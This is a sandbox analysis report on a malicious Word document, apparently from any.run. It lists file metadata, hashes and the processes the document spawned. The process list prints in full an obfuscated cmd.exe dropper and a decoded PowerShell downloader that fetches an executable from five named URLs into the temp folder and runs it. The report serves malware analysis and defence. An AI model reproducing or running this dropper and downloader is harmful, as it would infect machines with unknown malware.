File name: | d757b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0 |
---|---|
Full analysis: | https://app.any.run/tasks/032e3158-34eb-44cb-b4e8-7ebbac56284a |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 07:04:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 4 06:23:00 2018, Last Saved Time/Date: Tue Dec 4 06:23:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 43, Security: 0 |
MD5: | 94F8CC67F0979B25B8B129DF872F9822 |
SHA1: | 62C5533F74A3D4F5EC2D224CEA5481BD3D932B30 |
SHA256: | D757B7954BBC570FE19AB1EA593FFFB3B492E69C15232E2329134A1B01BC29E0 |
SSDEEP: | 1536:XeHocn1kp59gxBK85fBt+a9BMlfbuhv0Ivi:Xt41k/W48sShM8i |
.doc | | | Microsoft Word document (54.2) |
---|---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 49 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 43 |
Words: | 7 |
Pages: | 1 |
ModifyDate: | 2018:12:04 06:23:00 |
CreateDate: | 2018:12:04 06:23:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\d757b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3860 | c:\GXYNiHuIXdvR\sRXUolPj\WpptJsd\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b/+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=_HQfUL3JQ/IYsRv$z05;\j(ly{iWVyJD'^|.$ur= 5='m^>jaeA(EtaACITOi-ZCWeI?JkL\0oYEsv8dpnK)yIEi^<{X*V %NV)N^|k0Ho^|0X;Y0aX.034/8Xc] ,q2ei^>=g~Hn-:29 skdhA=wt]BMgm`(n{v\eEVgl.p=.*d5) 7hlR_bWJc^&Dk1w$D/] JfNmaV?e+c0t,VzI`:s-(=^>tJx{e=ZRG_Lz(L7t(Xo{ AK[f-R}I%kD;d)M'28HTL-_b,vaAxEz'^<=h=I:jO1}0v_tqs{.j$AwM;/GV)cAel;)`WWCDDI(N$TiM 3u\,J$inF9,m[wWu+g=$0g^<(42Ue~ {lsGFi1-8F`0fdvYFam-Ao4'~l%MJnnitwmVeoM@(D0:Z.SgpD;$Zs4CLi'.`$u*H{fNjyI.er%CMtom {^|So)4{cP{L^>Kw?ao~:f$#Ab \xnn@fiit\G NL]n_C,mw(/uj#X$.kN($9-h$6*cv_oa6- e#5Pr45Koo}Nf73';noK'x'je:*nxNm^<e8g..P{.'gh$+UyBzZ:?q\t*B}^&5$#% +9=v'AfY\VGh'Kkn+BGSpiFLmeZpegO9tB#n:$2JvO [nbsxeE+-$^<9:=ltMl%*LWNk0DVfY$krv;\`C'wsiRl('q5%=B89f'c}'=?I3h.aKY1%#swfv$U3P;]q^|'q4X4#@80Onl5{:c'q/t LOU=EgS /N=z^|}HqP'CB*B,$;Ah;DbY'i#:z?r5n(5Ef[a,';x4=rvYKRW$j7wGC(-T$Mvk;\mk) uU'Li?@P`w'0W((J80t$^&*i$28leWqp;fYSrh}.pA('}lmXkS+qEuKuB}UJBJ755c#EP^>NT]{^&MV^<NU`J9/8J_m^<x]ojqJcu\:.9[kownht:viu.=oaG#Qn?zbcpMse6#itJ]t/dBl/wuF:@%*pK\:tJRItP=~hl:S@guYA'NWLJHYM^>GesctkPn\?Z@Znbl(QofB.y@*?/.l1tZeie7zpnJdM.X-.6h$ol,t]a~Cwrtl]u^&E/akhS/oPe/./$:]R}pWlHt.BltFE^&h^>7P@f]-vv^>YLvN)Cs9ei+ymd,g^<7*v,6B(sE*RYZ7Zw/m9smhXuo0z1cc?^>.?5~yT@-o?{_b4TNnxF9i;fua'):h5%9c3i6/kw^>/6:n:h9lpx;htDJit,OUhD;@@^|74UOfLpWe-iR6aB{VPt=r+55w`Q^&btmWe[/kfKm-f#oUXtcu/A.D.^>rKuieEIut;[Bh1^</g8RCif/gr:iSb:f,niV+r0t@u#V/bW%K/r^&Y/rs_:L6'prEut+h,tS`Ohvf8@\0NG}8JT+itgOkJB7)H3=40ik`b0')9/K%=m]\:oWG#c\F$.YKAa{SRr_f[a~AhiO79c`m2yUmeb2_b/G+U/S8+:#WvprcAt^&GMt/o-h^>Rg'B4x=p\+PCGUK)rao xa$p%';z}gt.eCnBl_eJF9iyT\l)QDCx[zbC{}e}LPWSb[.871tsY+ewU[Nmhx $85tAvkc@*UeqyNj4zpb`uMosw,-,\jwpnHe6{Wn:kG=2~FDj4asX91i[(-$\AY;V9n'oaBs5/Kf.O2VdEC'f`{=^>jLlj;cw0;4m.^>'f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %6 in (1735,-4,3)do set 5O=!5O!!iC:~%6,1!&&if 
%6 leq 3 echo !5O:~4! |%TMP:~-17,1%ower%ProgramW6432:~-1%hel%CommonProgramFiles(x86):~13,-21% -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2396 | CmD /V/C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b/+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=_HQfUL3JQ/IYsRv$z05;\j(ly{iWVyJD'^|.$ur= 5='m^>jaeA(EtaACITOi-ZCWeI?JkL\0oYEsv8dpnK)yIEi^<{X*V %NV)N^|k0Ho^|0X;Y0aX.034/8Xc] ,q2ei^>=g~Hn-:29 skdhA=wt]BMgm`(n{v\eEVgl.p=.*d5) 7hlR_bWJc^&Dk1w$D/] JfNmaV?e+c0t,VzI`:s-(=^>tJx{e=ZRG_Lz(L7t(Xo{ AK[f-R}I%kD;d)M'28HTL-_b,vaAxEz'^<=h=I:jO1}0v_tqs{.j$AwM;/GV)cAel;)`WWCDDI(N$TiM 3u\,J$inF9,m[wWu+g=$0g^<(42Ue~ {lsGFi1-8F`0fdvYFam-Ao4'~l%MJnnitwmVeoM@(D0:Z.SgpD;$Zs4CLi'.`$u*H{fNjyI.er%CMtom {^|So)4{cP{L^>Kw?ao~:f$#Ab \xnn@fiit\G NL]n_C,mw(/uj#X$.kN($9-h$6*cv_oa6- e#5Pr45Koo}Nf73';noK'x'je:*nxNm^<e8g..P{.'gh$+UyBzZ:?q\t*B}^&5$#% +9=v'AfY\VGh'Kkn+BGSpiFLmeZpegO9tB#n:$2JvO [nbsxeE+-$^<9:=ltMl%*LWNk0DVfY$krv;\`C'wsiRl('q5%=B89f'c}'=?I3h.aKY1%#swfv$U3P;]q^|'q4X4#@80Onl5{:c'q/t LOU=EgS /N=z^|}HqP'CB*B,$;Ah;DbY'i#:z?r5n(5Ef[a,';x4=rvYKRW$j7wGC(-T$Mvk;\mk) uU'Li?@P`w'0W((J80t$^&*i$28leWqp;fYSrh}.pA('}lmXkS+qEuKuB}UJBJ755c#EP^>NT]{^&MV^<NU`J9/8J_m^<x]ojqJcu\:.9[kownht:viu.=oaG#Qn?zbcpMse6#itJ]t/dBl/wuF:@%*pK\:tJRItP=~hl:S@guYA'NWLJHYM^>GesctkPn\?Z@Znbl(QofB.y@*?/.l1tZeie7zpnJdM.X-.6h$ol,t]a~Cwrtl]u^&E/akhS/oPe/./$:]R}pWlHt.BltFE^&h^>7P@f]-vv^>YLvN)Cs9ei+ymd,g^<7*v,6B(sE*RYZ7Zw/m9smhXuo0z1cc?^>.?5~yT@-o?{_b4TNnxF9i;fua'):h5%9c3i6/kw^>/6:n:h9lpx;htDJit,OUhD;@@^|74UOfLpWe-iR6aB{VPt=r+55w`Q^&btmWe[/kfKm-f#oUXtcu/A.D.^>rKuieEIut;[Bh1^</g8RCif/gr:iSb:f,niV+r0t@u#V/bW%K/r^&Y/rs_:L6'prEut+h,tS`Ohvf8@\0NG}8JT+itgOkJB7)H3=40ik`b0')9/K%=m]\:oWG#c\F$.YKAa{SRr_f[a~AhiO79c`m2yUmeb2_b/G+U/S8+:#WvprcAt^&GMt/o-h^>Rg'B4x=p\+PCGUK)rao xa$p%';z}gt.eCnBl_eJF9iyT\l)QDCx[zbC{}e}LPWSb[.871tsY+ewU[Nmhx $85tAvkc@*UeqyNj4zpb`uMosw,-,\jwpnHe6{Wn:kG=2~FDj4asX91i[(-$\AY;V9n'oaBs5/Kf.O2VdEC'f`{=^>jLlj;cw0;4m.^>'f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %6 in (1735,-4,3)do set 5O=!5O!!iC:~%6,1!&&if %6 leq 3 echo !5O:~4! 
|power%ProgramW6432:~-1%hel%CommonProgramFiles(x86):~13,-21% -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2456 | C:\Windows\system32\cmd.exe /S /D /c" echo $mwl='Vfs';$isD=new-object Net.WebClient;$oKP='http://byciara.com/0i3BgTG@http://burnbrighter.com/mQ5tBipU@http://chainboy.com/ZE67diCLv@http://aural6.net/yobZPsMLA@http://tecnauto.com/UMTE5JuqX'.Split('@');$CjK='fnz';$Bqz = '504';$sYh='BqR';$DWl=$env:temp+'\'+$Bqz+'.exe';foreach($umn in $oKP){try{$isD.DownloadFile($umn, $DWl);$svO='AbT';If ((Get-Item $DWl).length -ge 80000) {Invoke-Item $DWl;$YJf='QSJ';break;}}catch{}}$CtL='wlP'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6C09.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:5E2041FDA144453159427A44F1671FF2 | SHA256:DADC67B011C595DC89FECEA682D77EFF235948180174F716411FB54E49BF309A | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$57b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0.doc | pgc | |
MD5:65022AF5A51C3BEE12E731C531C02C24 | SHA256:58EF79BD6F8213001F2DD81A5D500D34759AB5B4C2861C922B72DF0792E56606 | |||